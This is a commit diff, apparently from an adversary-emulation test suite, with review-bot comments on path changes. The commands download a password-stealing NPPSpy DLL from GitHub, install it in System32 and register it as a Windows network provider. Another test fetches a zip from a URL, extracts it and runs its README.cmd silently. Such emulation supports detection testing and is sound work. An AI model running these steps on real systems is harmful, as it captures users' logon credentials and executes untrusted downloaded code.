use ExternalPayloads folder (#2538)

This commit is contained in:
Carrie Roberts
2023-09-22 21:43:06 -06:00
committed by GitHub
parent 78204c6965
commit fc3bfecda2
2 changed files with 8 additions and 8 deletions
+1 -1
@@ -66,7 +66,7 @@ atomic_tests:
Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll"
executor:
command: |-
Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
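Review bot: The Copy-Item on the changed line has no error handling, so if NPPSPY.dll is absent from ExternalPayloads (the prereq download did not run or failed) the copy only raises a non-terminating error and the executor still appends NPPSpy to PROVIDERORDER two lines later, leaving the registry changed with no provider DLL in place. Adding `-ErrorAction Stop` would abort before the registry write: `Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32" -ErrorAction Stop`. The PROVIDERORDER append is also not idempotent, so a second run produces a duplicate `,NPPSpy` entry, which the cleanup_command (outside this hunk) presumably has to tolerate. The atomic test this executor belongs to starts before the hunk.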
+7 -7
@@ -27,15 +27,15 @@ atomic_tests:
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\T1036.zip" -DestinationPath "$env:userprofile\Downloads\T1036" -Force
cd "$env:userprofile\Downloadss\T1036"
cmd /c "$env:userprofile\Downloads\T1036\README.cmd" >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
Remove-Item "$env:userprofile\Downloads\T1036" -recurse -ErrorAction Ignore
name: powershell
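Review bot: `Downloadss` on the new `cd` line is a typo; the Expand-Archive line just above extracts to `$env:userprofile\Downloads\T1036`, so the `cd` fails with a path-not-found error and the following `cmd /c` runs in whatever working directory the executor started in. It should read `cd "$env:userprofile\Downloads\T1036"`. The README.cmd invocation uses an absolute path so it still launches, but anything inside it that depends on the current directory behaves differently than before this change. Separately, `name: powershell` appears on both the old and new side of the rendered view; I cannot tell from the page whether that is a whitespace-only change or a duplicated key, which is worth checking in the raw diff.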